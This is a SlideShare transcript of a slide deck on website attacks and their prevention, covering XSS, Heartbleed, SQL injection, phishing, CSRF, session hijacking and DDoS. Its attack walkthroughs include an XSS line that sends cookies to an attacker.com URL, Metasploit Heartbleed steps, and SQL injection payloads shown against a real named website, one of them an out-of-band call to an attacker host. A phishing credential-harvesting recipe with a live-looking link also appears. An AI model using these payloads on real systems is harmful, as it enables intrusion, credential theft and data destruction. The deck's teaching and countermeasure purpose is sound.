SlideShare a Scribd company logo

Website hacking and prevention (All Tools,Topics & Technique )

Download as PPTX, PDF
Jay Nagar
Jay Nagar

This document discusses the Heartbleed vulnerability in OpenSSL and its potential impacts. Heartbleed is a bug in the OpenSSL cryptography library that exposes the contents of the server's memory, including private keys and user session cookies. An attacker can exploit Heartbleed to steal sensitive data from vulnerable servers or impersonate services. The vulnerability had widespread implications because OpenSSL is used to secure a majority of websites. While patching servers and changing passwords addressed direct theft of information, Heartbleed also weakened the security of encrypted communications and online identities.

Related slideshows

CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Malware and security
Malware and securityMalware and security
Malware and security
 
1 of 180
Website hacking and prevention (All Tools,Topics & Technique )
CURRENT TECHNOLOGIES
Website hacking and prevention (All Tools,Topics & Technique )
Static Websites • Quick to develop • Easy to host • More secure • Less easily hackable • Requires web development expertise to update site • Site not as useful to the user • Content can get stagnant Dynamic Websites • Slower/Expensive to develop • Hosting Costs a little more • Less Secure • Prone to hacking • Much more functionalities • Easy to update • New content brings people back to the site and helps in the search engines • Can work as a system to allow staff or users to collaborate Types of Websites
DYNAMIC WEBSITE S
WEBSITE BASE
Website hacking and prevention (All Tools,Topics & Technique )
Website Technologies • Markup Languages HTML CSS XML • Programming and Scripting Languages JavaScript VBScript Php C# Perl Asp.net • Web Servers Internet Information Services (IIS) Apache • Databases SQL Server MYSQL
Ever come across a screen like this??
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
URL HIJACKING Make money from your mistake They buy badly spell domain Redirect from the famous URLs Fake website or phishing site Infect with a drive by download
Display Hijacking Paid Search Hijacking Types of URL hijacking
CLICKJACKING iframe Z- index Opacity Position
STROKEJACKING It is extremely similar to clickjacking, in that a malicious site has a user doing things they don’t want to do. Except, this time, it’s with the keyboard instead of the mouse – hence the “stroke”. The attacking site gets the user to type (or cut and paste), the information they’re looking for. This could lead to another attack (if the user types JavaScript), or just gathering a username and password. The user thinks they are logging into a site, but they’re really sending characters over to the attacker’s site. TAPJACKING • A hacking technique where a malicious application presents an unreal user interface in order to obtain user events for a hidden action in the background. • Like Clickjacking on the web, Tap Jacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it. • Mostly the tap jacking technique is used for mobile application and mobile websites
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Tools and Techniques Required to Perform Attacks  WHOIS  Robots.txt files  HTTrack-clone a website  BeEF Tool  Electronic Data Gathering, Analysis and Retrieval (EDGAR)  Shodan Search  Google Hacking  DNS Lookup  Nslookup  DIG (Domain information Groper)  Netcraft  Httprint  Fierce  Encoder and Decoder
OPEN SOURCE TOOLS
Commercial TOOLS
XSS
Content  Definition  Types  Process  Live Attack  Risks  Counter Measures
Definition  Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications.  XSS enables attackers to inject client-side scripts into web pages viewed by other users.  A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
XSS Types  Persistent (Stored) Stored or Persistent XSS is a kind of XSS vulnerability where the untrusted user input is processed and stored by the server in a file or database without any validation and this untrusted data is fetched from the storage and is reflected back in response without encoding or escaping resulting in permanent code execution at the browser whenever the stored data is reflected in the response. - link in other website or email
XSS Types  Non Persistent (Reflected) Reflected or Non-Persistent XSS is a kind of XSS vulnerability where the untrusted user input is immediately processed by the server without any validation and is reflected back in the response without encoding or escaping resulting in code execution at the browser. - forum, bulletin board, feedback form
XSS Types  Local (DOM based) DOM Based XSS is a form of client side XSS which occurs in an environment where the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. It occurs when an untrusted data is given at the source is executed as a result of modifying the DOM “environment” in the browser. DOM XSS occurs when the untrusted data is not in escaped or encoded form with respect to the context. - PDF Adobe Reader, Flash Player
Process
Screenshot 1)An attacker finds an xss hole in a web application
2) The attacker creates an attack URL for stealing sensitive Information and disguises it so that it appears legitimate. Here it is, <script> document.location = ”http://localhost/attacker.com/redirect.php?a=” + document.cookie</script> 3) The attacker distributes the malicious XSS link via social engineering to unsuspected users.
Screenshot 4) When the victim logs in, Javascript embedded with the malicious XSS link executes and transmits the victim’s login information to the attacker.
Website hacking and prevention (All Tools,Topics & Technique )
XSS Risks XSS can 1) Steal Cookies - Hijack of user’s session - Unauthorized acess 2)Spy on what you do 3)Modify the content of web page by - Inserting images or words - Misinforming - Spreading Bad Reputation 4)Network Mapping 5)XSS viruses
XSS Countermeasures 1) Content Filtering: “The application may attempt to detect and remove all scripts from un- trusted HTML before sending it to the browser.” Content filtering is otherwise known as sanitization. This defense technique uses filter functions to remove potentially malicious data or instructions from user input. Filter functions are applied after user input is read by a web application, but before the input is employed in a operation or output to the web browser. Removal of scripts from un-trusted content is a difficult problem for web applications that permit HTML markup in user input such as blog. To be completely effective in eliminating XSS, a filter function must necessarily model the full range of parsing behaviors pertaining to script execution for several browsers.
XSS Countermeasures Challenges of Content Filtering: Allowing all benign HTML user input, while simultaneously blocking all potentially harmful scripts in the un-trusted output. Every control character that can be used to introduce attack code also has a legitimate use in some benign, non-script context. For example, the ' < ' character needs to be present in hyperlinks and text formatting, and the ' " ' character needs to be present in generic text content. Both are legitimate and allowed user inputs, but can be abused to mount XSS attacks. Browser behavior vary from browser to browser, they are complex to model, not entirely understood and not all known (especially for closed source browsers like Microsoft internet explorer). Therefore, from a web application perspective, the task of implementing correct and complete content filter functions is very difficult, if not impossible.
XSS Countermeasures 2) Browser Collaboration: “The application may collaborate with the browser by indicating which scripts in the web page are authorized, leaving the browser to ensure the authorization policy is upheld.” Robust prevention of XSS attacks can be achieved if web browsers are made capable of distinguishing authorized from unauthorized scripts. This approach can be implemented by (a) creating a server–browser collaboration protocol to communicate the set of authorized scripts, then (b) modifying the browser to understand this protocol and enforce a policy denying unauthorized script execution.
XSS Countermeasures Challenges of Browser Collaboration: Although this defense strategy is compelling and effective long term solution, but its implementation will take long time because web applications adopting this approach require their users to employ modified browsers for protection from XSS attacks. To implement this there must be agreement on some standards for server browser collaboration, then these new standards must be incorporated in the normal browser implementation. This is a long, complicated process that can take several years. Ex: Browser-Enforced Embedded Policies (BEEP)
HEARTBLEE D
Heartbleed is a security bug in the OpenSSL cryptography library.
OpenSSL is a software library to be used in applications that need to secure communications over computer networks against eavesdropping or need to ascertain the identity of the party at the other end. It has found wide use in internet web servers, serving a majority of all web sites. OpenSSL contains an open-source implementation of the SSL and TLS protocols.
Website hacking and prevention (All Tools,Topics & Technique )
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) is the most widely deployed security protocol used today. It is essentially a protocol that provides a secure channel between two machines operating over the Internet or an internal network.
What happened..??  Vulnerability Heartbleed was announced to the world on 7th April 2014, as OpenSSL vulnerability and with a new code release ( 1.0.1g)  It was found by Google security Team and Condenomicon  Told that Private keys to SSL certificates could be exposed  Many Big name companies were vulnerable; Big tech names, Banks, law enforcement, Intelligence Agencies  But...
What is heartbeat extension?  Heartbeat is an echo functionality where either side (client or server) requests that a number of bytes of data that it sends to the other side be echoed back.  The idea appears to be that this can be used as a keep- alive feature, with the echo functionality presumably meant to allow verifying that both ends continue to correctly handle encryption and decryption
Website hacking and prevention (All Tools,Topics & Technique )
Background The Heartbleed vulnerability is possibly the worst thing that ever happened to online trust. Ironically, Heartbleed makes HTTPS less secure than plain HTTP because attackers can obtain sensitive data without even having to intercept traffic. Initial reactions focused on : • patching vulnerable web servers, • revoking SSL certificates • changing user passwords. It took a couple more days to realize that Heartbleed also affects client software, non-web SSL traffic and countless embedded devices which will never receive a software update.
Lets see how to perform this attack with Metasploit..!!
 It can be performed with powerful exploit framework, Metasploit  We'll see how it's performed step by step  Step 1: Update Metasploit using msfupdate  Step 2: Start metasploit  Kali > msfconsole
Metasploit startup screen
 Step 3 : Find Heartbleed  search heartbleed  This would bring up two modules  auxiliary/scanner/ssl/openssl_heartbleed  and  auxiliary.server/openssl_heartbeat_client_me mory  We'll use first one
Step 3 screenshot
Step 4  Use Auxiliary module  use auxiliary/scanner/ssl/openssl_heartbleed  This will load the heartbleed module
info  Type msf > info  This reveals the options that need to set in order to use this module and a description of the module
Website hacking and prevention (All Tools,Topics & Technique )
Step 5  Set options  Although this module has numerous option, the critical one is RHOSTS  Let's set it to a target website on network that is still vulnerable to heartbleed  msf > set RHOSTS 192.168.1.169
Step 5
Step 6 : Run the module  Finally, set the option 'verbos' to 'true'. This will provide us with verbos output. Msf > set verbos true  And lets run it msf > run  As we can see in next screenshot , the server leaked about 64k bytes of what was in it's memory
Success..!!
Let Us Define…. • Alice, Bob: Users of online services. • Eve: A passive attacker (eavesdropper). • Trudy: An active attacker who may exploit the Heartbleed bug by sending specially crafted heartbeat packets over an SSL (e.g.HTTPS) connection. • yuri.com: A web site with vulnerable SSL software. Since OpenSSL is so widely used, any web site should be considered as a potential yuri.com until proven otherwise.
Attack patterns and countermeasures
1 Extraction of sensitive data from vulnerable HTTPS servers In this scenario Alice enters or consults sensitive data on yuri.com over HTTPS. Plain-text data linger in the memory of the web server. Later, Trudy connects as a regular HTTPS clients and exploits Heartbleed. Countermeasures for end users • Do not exchange sensitive information with a web site until they tell you they have dealt with Heartbleed. Field reports • Canadian charged in 'Heartbleed' attack on tax agency.
2. Session hijacking from vulnerable HTTPS servers In this scenario Trudy extracts session cookies rather than login credentials. This allows her to take control of Alice's account without waiting for her to enter her credentials. Countermeasures for end users • Log out of online services until they have dealt with Heartbleed.
3. Extraction of SSL private keys from vulnerable HTTPS servers In this scenario Trudy extracts the SSL/TLS private key of yuri.com. Regardless of what happens next, leakage of private keys is always a major failure. Lessons learned • Protect private keys with a hardware security module. Field reports • Confirmed: Heartbleed Exposes Web Server's Private SSL Keys
5. Tor traffic correlation Eve, an evil dictator, wants to establish that Alice is using Tor to communicate with george.com, a foreign human- rights organization. Eve can spy on all Internet traffic within her national boundaries but has no wiretapping authority in other countries. She exploits Heartbleed massively against vulnerable Tor exit nodes in order to match outgoing traffic with her local intercepts.
4. Man-in-the-middle impersonation of online services In this scenario mallory.com impersonates yuri.com after extracting its SSL private key. This so-called man-in-the- middle attack (MITM) is more dangerous than passive snooping because mallory.com can trick Alice into using a compromised certificate. It also allows mallory.com to defeat some multi-factor security measures. Countermeasures for end users • Check whether your browser detects revoked certificates. • If it does not, inspect certificates manually. Lessons learned • Heartbleed will probably be the end of the current certificate revocation infrastructure.
6. De-anonymization of hidden servers and users by malicious Tor nodes Trudy sets up a number of malicious Tor guard node. She exploits the Heartbleed vulnerability against clients that connects to them, including Tor hidden servers and their users. Although Tor hidden services are encrypted end-to- end, Trudy can identify vulnerable users and servers based on plaintext data leaked by Heartbleed at each end. Besides, if she extracts the private key of a hidden service, she can impersonate it. Field reports • "Tor hidden services might leak their long-term hidden service identity keys to their guard relays."
7. Attacks against VPN servers Alice is aware that most public WiFi networks provide no privacy. Therefore she has configured her smartphone and laptop to connect to the Internet through a VPN service provider, yuri.com. (Alternatively, she could be running her own VPN server at home, or using the VPN feature that comes bundled with her DSL modem or her NAS box.) Eve snoops on the WiFi network that Alice is currently using, notices SSL-based VPN traffic from her smartphone, exploits Heartbleed against the destination IP address, and retrieves either VPN keys or plaintext traffic. Field reports • Attackers Exploit the Heartbleed OpenSSL Vulnerability to Circumvent Multi-factor Authentication on VPNs • OpenVPN uses OpenSSL as its crypto library by default and thus is affected
Some General Countermeasures  Do not use OpenSSL 1.0.1f.  Disable heartbeat extension.  Change login credentials if your site is compromised.
DANGER : OpenSSL, an open source project staffed by only 10 individuals and run on a limited budget, is used to secure millions of servers, ensuring the integrity of email, e- commerce, online banking and other properties, in many cases for multi-billion dollar companies. Heartbleed obviously has wide-reaching implications, not only for the integrity of the Web, but also for mobile apps – but how much damage did it actually do prior to its discovery and patching?
How damaging is Heartbleed?
The issue has also spread to mobile devices. Android apps, for instance, may connect to servers that could be affected by Heartbleed. While not dedicated browsing tools such as Google Chrome or Apple Safari, some of these apps have their own internal browsers, blurring the line between mobile software and the Web. That risk is worth noting, not just for the OpenSSL exploit but for future considerations about overall Internet security.
Lookingahead …
These weaknesses are all addressable, and the speed with which companies and security experts have acted has been encouraging. Still, the community will have to stay on its toes to protect the emerging Internet of Everything from OpenSSL and future bugs.
SQL Injection Attack
What is SQL? SQL (Structures Query Language) is a programming language to manage database. The managements systems that employ SQL are Microsoft SQL Database, Oracle, MySQL, PostgreSQL, and others.
What is SQL Injection SQL injection i.e. SQLI refers to the injection attack in which the attacker executes malicious SQL queries that control a web application database server The attacker can use SQL injection to :  Add, delete, edit or read content from the database  Read source code from files on the database server  Write files to the database server
Classification of SQL injections There are 3 major classifications: 1. In-band SQLi (Classic SQLi) 2. Inferential SQLi (Blind SQLi) 3. Out-of-band SQLi
In-Band SQLi Or Classic Attacks Most attacks rely on basic SQL manipulation and are considered to be classic attacks. It includes  WHERE clause modification  UNION operator injection  query stacking
WHERE Clause Manipulation: Any user input generally end up in a WHERE Clause of the data base Example: In a login page where username is entered the SQL query looks like this:  SELECT * FROM users WHERE name = '" + userName + "';  if the "userName" variable is crafted in a specific way,the SQL statement may do more than the code author intended.setting the "userName" variable as: ' OR '1'='1  or using comments to even block the rest of the query ' OR '1'='1' – These user inputs renders the SQL Query like the following  SELECT * FROM users WHERE name = '' OR '1'='1';  SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
Website hacking and prevention (All Tools,Topics & Technique )
SQL injection Using UNION: The UNION operator allows the attacker to extract sensitive information from the database.  Example: USER INPUT:  ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a GENERATED QUERY:  SELECT id, name, description FROM products WHERE category = '' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a‘ The crafted query returns usernames and passwords of all members in the database.
 Query stacking:Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures.  Example A classic attack using this technique could look like the following. MALICIOUS USER INPUT:  1; DELETE FROM products GENERATED QUERY WITH MULTIPLE STATEMENTS:  SELECT * FROM products WHERE productid=1; DELETE FROM products
Inference SQLi attack The main intent of the attacker in an inference SQLi is identifying the injectable parameters, extracting database schema. Here no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band. It is also referred as Blind injection attack There are two well-known attack techniques that are based on inference:  Boolean-Based-Blind Injection  Time-based-blind Attacks
Boolean-based-Blind Injection: Information is inferred from the behaviour of the page by asking the server true/-false questions. If the injected statement evaluates to true, the site continues to function normally. If the statement evaluates to false, although there is no descriptive error message, the page differs significantly from the normally-functioning page. Example: In this website it shows some information which is stored in some database http://www.psn.com.pk/index.php?page=gallery.php&id=519 The attacker finds the vulnerability using Boolean based blind injection False query: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2 True query: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Timed-based-blind attack: For Time-based attacks, the attacker needs to instruct the database to perform a time-intensive operation. If the web site does not return a response immediately, the web application is vulnerable to Blind SQL Injection. A popular time intensive operation is the sleep operation. Example: In the website http://www.psn.com.pk/index.php?page=gallery.php&id=519 To perform time based blind attack the query will become: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1, sleep(10), false)
Website hacking and prevention (All Tools,Topics & Technique )
Out-of-band SQLi  Out-of-band attack occurs when the attacker is unable to the same channel to attack and gather result  Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable. Consider the following URL crafted by an attacker: https://example.com/products.aspx?id=1;EXECmaster..xp_dirtree 'test.attacker.com' – This will produce the following SQL query.  SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree 'test.attacker.com' --
 What happened is that there are now two separated queries that SQL Server will execute. /* First Query */  SELECT * FROM products WHERE id=1 /* Second Query */  EXEC master..xp_dirtree 'test.attacker.com' –  The second query is invoking a stored procedure xp_dirtree. This extended stored procedure can be used to get a list of all the folders for the folder named in the xp.
screenshots
Recording of SQL attack
SQL Injection (SQLi) SQL INJECTION (SQLI) REFERS TO AN INJECTION ATTACK WHEREIN AN ATTACKER CAN EXECUTE MALICIOUS SQL STATEMENTS (ALSO COMMONLY REFERRED TO AS A MALICIOUS PAYLOAD) THAT CONTROL A WEB APPLICATION’S DATABASE SERVER (ALSO COMMONLY REFERRED TO AS A RELATIONAL DATABASE MANAGEMENT SYSTEM – RDBMS).
How SQL Injection works  SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’  # Define POST variables  uname = request.POST['username']  passwd = request.POST['password’]  # SQL query vulnerable to SQLi  sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”  # Execute the SQL statement  database.execute(sql)
What’s the worst an attacker can do with SQL?  bypass authentication or even impersonate specific users.  allow the complete disclosure of data residing on a database server.  data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.  to delete records from a database  to allow arbitrary execution of operating system commands on the database server
What is a SQL Injection Vulnerability?  Non-Technical Explanation  Drive through <route> and <where should the bus stop?> if <when should the bus stop?>.  Drive through route 66 and stop on bus stops if there are people on the bus stops.  Drive through route 66 and do not stop on bus stops and ignore the rest of this form. if there are people on the bus stop.
What is a SQL Injection Vulnerability?  Technical Explanation  $statement = "SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw’”  $statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
Different Types of the SQL Injection Vulnerability  Error based SQL Injection  Boolean Based SQL Injection  Time based SQL Injection  Out-of-Band SQL Injection Vulnerability
Impacts of the SQL Injection Vulnerability  Add, delete, edit or read content from the database  Read source code from files on the database server  Write files to the database server
Preventing SQL Injection Vulnerabilities  Server side scripting languages are not able to determine whether or not the SQL query string is malformed; all they can do is send a string to the database server and wait for the interpreted response  when developing web applications you should use prepared statements to prevent SQL injections. When using prepared statements the structure and data are separated and can be interpreted by the sql server without risking that an attacker is able to change the structure of the SQL query for malicious purposes
What Can Be Done to Prevent SQL Injection Attacks?  sanitization  validation
Sanitization  Sanitization usually involves running any submitted data through a function (such as MySQL's mysql_real_escape_string() function) to ensure that any dangerous characters (like " ' ") are not passed to a SQL query in data.
Validation  attempts to ensure that the data submitted is in the form that is expected. At the most basic level this includes ensuring that e-mail addresses contain an "@" sign, that only digits are supplied when integer data is expected, and that the length of a piece of data submitted is not longer than the maximum expected length Two ways:  by blacklisting dangerous or unwanted characters (although hackers can often get around blacklists)  by whitelisting only those characters that are allowed in a given circumstance, which can involve more work on the part of the programmer
Others way of prevention  Trust no-one  Don't use dynamic SQL when it can be avoid  Firewall  Update and patch  Reduce your attack surface  Use appropriate privileges  Keep your secrets secret  Don't divulge more information than you need it
Phishing
Phreaking + Fishing = Phishing {Phreaking = making phone calls for free back in 70’s} Phishing is the act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. What is Phishing ?
Target By Sector
PhiShing
 Spear Phishing  Clone Phishing  Whaling ___________________________________________________________ Spear Phishing Phishing attempts directed at specific individuals or companies have been termed spear phishing. Attackers may gather personal information about their target to increase their probability of success. This technique is by far the most successful on the internet today, accounting for 91% of attacks. Phishing Types
Clone Phishing A type of phishing attack where a legitimate, email containing an attachment or link has had its content and recipient address taken and used to create an almost identical or cloned email. The attachment or Link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a re-send of the original or an updated version to the original. Whaling Several recent phishing attacks have been directed specifically at senior executives and other high profile targets within businesses, and the term whaling has been coined for these kinds of attacks.
Place your screenshot here Step: 1 Setting Up A Web Page Which Looks Similar To The Original One. Link : http://a0145877.xs ph.ru/ HERE’S HOW IT’S DONE
Place your screenshot here Step: 2 A php script which stores credentials to a file is what required to harvest credentials
Place your screenshot here Step: 3 In the html page search for submit form and change it to written php script
STEP: 4 Host it in a server & Share The Link
Website hacking and prevention (All Tools,Topics & Technique )
118
119
PHISHING DON’T GET HOOKED
It is the attempt to obtain sensitive information such as usernames, passwords, and credit card details, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. DEFINITION TYPES OF PHISHING • Spear phishing • Clone phishing • Whaling • Filter evasion • Link manipulation • Tabnabbing
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
1. Be wary of emails asking for confidential information 2. Make sure you familiarise yourself with a website's privacy policy 3. Watch out for generic-looking requests for information. 4. Never submit confidential information via forms embedded within email messages. 5. Never use links in an email to connect to a website unless you are absolutely sure they are authentic. Instead, open a new browser window and type the URL directly into the address bar 6. Make sure you maintain effective software to combat phishing How to protect yourself
PHISHING COUNTERMEASURES IN DETAIL
Auto-Generate Domain-Specific Password Hashing of passwords with a secret key along with website domain name.
Auto-Generate Domain-Specific Password Due to this mechanism, it becomes really hard for the attacker to get the password.
Auto-Generate Domain-Specific Password Disadvantage • Practical implementation is quite difficult. • Many banks use multiple domains and sub- domains • It’s a static solution
Web Browser’s PWD Database Random passwords are generated and stored in the browsers. It is more “secure,” as the browser will only give the credentials to the right URL. If anything changes in the URL, it won’t pass credentials Disadvantage- •It doesn’t work fully with sub-domains. •Even here, passwords are stored in plain text.
Phishing Scam Alert Add- ons/Extensions The concept is like this. If server visits any known fake/phishing URL, then that tool bar turns red.
Phishing Scam Alert Add- ons/Extensions If that phishing or fake site is the one suspect site, then it turns yellow.
2FA—Two-Factor Authentication It requires not only a username and password, but also some piece of information that only the user knows (physical token).
Encrypted Key Exchange Process—Prevent Dictionary Attacks Series of protocols are implemented for encrypted key exchange. This key is generated by combining the shared password. This process takes place in such a way that the phisher can’t guess it. These protocols were awkward to implement and use and they were also too time-consuming.
Educating Your People Conducting seminars and workshops on ethical hacking and Internet security in order to educate their employees. This can be a quality step towards security awareness. Logical awareness has to be raised.
CSRF
Content  Definition  Attack Process  Screenshots  CounterMeasures  Tools  References
Definition  Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.  CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.
Definition Cont...  With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.  If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth.  If the victim is an administrative account, CSRF can compromise the entire web application.
Process  Root cause of CSRF  Existing browsers do not check whether a client actually initiates an HTTP request 140 Malicious Website Browser Target Website Send login request Send forged request with cookies Return login response with cookies Visit malicious website Return malicious code
Screenshot Step 1 − Let us perform a CSRF forgery by embedding a Java script into an image. The snapshot of the problem is listed below.
Screenshot Step 2 − Now we need to mock up the transfer into a 1x1 image and make the victim to click on the same.
Screenshot Step 3 − Upon submitting the message, the message is displayed as highlighted below.
Screenshot Step 4 − Now if the victim clicks the following URL, the transfer is executed, which can be found intercepting the user action using burp suite. We are able to see the transfer by spotting it in Get message as shown below – Step 5 − Now upon clicking refresh, the lesson completion mark is shown.
Tool – OWASP CSRF Tester Test your applications for CSRF -Record and replay transactions -Tune the recorded test case -Run test case with exported HTML document Test case alternatives -Auto-Posting Forms -Evil iFrame -IMG Tag -XMLHTTPRequest -Link
Counter Measures  Web application should insert random values, tied to the specified user’s session, into the forms it generates  Web application should re-authenticate every time when users are about to perform a particularly dangerous operation
Counter Measures Cont.. Safe Methods 1) The GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe" ... $_POST superglobal and not $_GET or $_REQUEST 2)Try to force the use of your own forms - On form generation, store unique token in user $_SESSION and form hidden field - On submit, check token -- Limits attack to only single user -- Attacker would need to obtain users valid form AND session token - Put expiry on form tokens
Session HIJECKING
What is session hijacking ? Session hijacking is the process of exploiting valid computer session which involves stealing the victim's cookie.
What is a cookie ? • A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser. • A cookie is sent as an header by the web server to the web browser on the client side. • A cookie is static and is sent back by the browser unchanged every time it accesses the server.
Types of session hijacking 1 ) Active : - In active attack, an attackers finds an active session and takes over. 2 ) Passive : - With passive attack, an attacker hijacks a session, but sits back, and watches and record all the traffic that is being send forth
Session hijacking working…
Website hacking and prevention (All Tools,Topics & Technique )
Showing video example of session hijacking
Website hacking and prevention (All Tools,Topics & Technique )
Session Hijacking Levels of Session Hijacking Session Hijacking ToolsSession Hijacking Steps CountermeasuresTypes Of Session Hijacking
Steps in Session Hijacking Place yourself between the victim and the target (you must be able to sniff the network) Monitor the flow of packets Predict the sequence number Kill the connection to the victim’s machine Take over the session Start injecting packets to the target server
Types of Session Hijacking There are two types of session hijacking attacks: Active • In an active attack, an attacker finds an active session and takes over Passive • With passive attack, an attacker hijacks a session, but sits back, and watches and records all the traffic that is being sent forth
Session Hijacking Levels Session hijacking takes place at two levels: • Network Level Hijacking • Application level Hijacking Network level can be defined as the interception of the packets during the transmission between client and the server in a TCP and UDP session Application level is about gaining control on HTTP user session by obtaining the session ID’s
Some common tools used for Session Hijacking The following are a few that belong to this category: • Juggernaut • Hunt • TTY Watcher • IP Watcher • T-Sight • Paros HTTP Hijacker
Counter Measures for Session Hijacking Use Encryption Use Secure protocol(SSL and HTTPS) Limit incoming connections where possible Minimize remote access Set a time out for the expiry of the session when inactive Expiry of session if the agent if browsing changes Logout Functionality
Counter Measures for Session Hijacking (Cont….) ID creation after authoritative login Long session ID’s Forcing re-authentication or set- up authentication Captcha prevention Educate the employees Expiry of session if the operating system changes Expiry of the session if the device changes(Web Socket)
Distributed Denial of Service
What is Distributed Denial of Service?  A denial-of-service attack (DoS attack) is a cyber-attack where the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
Website hacking and prevention (All Tools,Topics & Technique )
Types of DDos
Volume Based Attacks  Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (Bps).
Protocol Attacks  Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in Packets per second.
Application Layer Attacks  Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second.
LIVE DEMO
Prevention and Mitigation Strategy  The first things to do in DDoS mitigation is to identify normal conditions for network traffic by defining “traffic patterns”, which is necessary for threat detection and alerting. DDoS mitigation also requires identifying incoming traffic to separate human traffic from human-like bots and hijacked web browsers. The process is done by comparing signatures and examining different attributes of the traffic, including IP addresses, cookie variations, HTTP headers, and Javascript footprints.  One technique is to pass network traffic addressed to a potential target network through high-capacity networks with "traffic scrubbing" filters.
Law and Investigations
INVESTIGATION Challenges in the investigation of Cyber Crime (Website Crime) Investigation of Cyber-crimes are different from conventional investigation as:  Incident taking place in Virtual World  Borderless/Transnational  Issues of jurisdiction  Issue of connecting the accused with the machine/computer  Lack of enthusiasm in reporting Cyber crime
The essential Requirements for Investigation are:  Immediate Reporting of Breaches.  Adequate Tools.  Trained Investigators.  Computer Literate Witness.  Assistance of Forensic Experts.  Immediate investigation. Common Procedure of Web Site Crime investigation  Who is., Domain Detail,If domain is active then it must have working email address and payment detail, contact registrar, Registrar can give Domain IP address and cell number and payment instrument. 17 4
 Email ID used for Sell hosting server is important because police can get email id, creation IP, alternate email ID, Cell number, IP logs.  An Law Enforcement Agency of the India can demands the information like IP Logs, Login credentials of the accused for investigation through Section 91 of CRPC 1973, for detailed information of Section 91 of CRPC 1973 kindly refer annexure.  The Law Enforcement agencies can perform detailed investigation of the Cyber Crime cases through the Internet Protocol Data Record (IPDR) of the used network. The IPDR can be obtained from the ISP of the concerned network. The Sample of the IPDR is shown in figure. 17 5
FIGURE : Sample Of Notice under 91 Crpc 1973.
Figure : Sample of IPDR
Crimes and Laws Relating to Website.  Harassment via fake public profile on social networking site.  Online Hate Community.  Email Account Hacking.  Web Defacement.  Introducing Viruses, Worms, Backdoors, Rootkits, Trojans, Bugs.  Cyber Terrorism.  Phishing and Email Scams.  Theft of Confidential Information.
WEBSITE HACKING CASE STUDY  Hacking and defacement of Assam police website.  Hacker hacks into a financial website.  Indian Army website hacked.  ISRO Website Hack.  Bazee.com  E-Bay Account Takeover  Incometaxpune.Com Redirection To Pornographic Content
Website hacking and prevention (All Tools,Topics & Technique )

More Related Content

Website hacking and prevention (All Tools,Topics & Technique )

  • 4. Static Websites • Quick to develop • Easy to host • More secure • Less easily hackable • Requires web development expertise to update site • Site not as useful to the user • Content can get stagnant Dynamic Websites • Slower/Expensive to develop • Hosting Costs a little more • Less Secure • Prone to hacking • Much more functionalities • Easy to update • New content brings people back to the site and helps in the search engines • Can work as a system to allow staff or users to collaborate Types of Websites
  • 8. Website Technologies • Markup Languages HTML CSS XML • Programming and Scripting Languages JavaScript VBScript Php C# Perl Asp.net • Web Servers Internet Information Services (IIS) Apache • Databases SQL Server MYSQL
  • 9. Ever come across a screen like this??
  • 15. URL HIJACKING Make money from your mistake They buy badly spell domain Redirect from the famous URLs Fake website or phishing site Infect with a drive by download
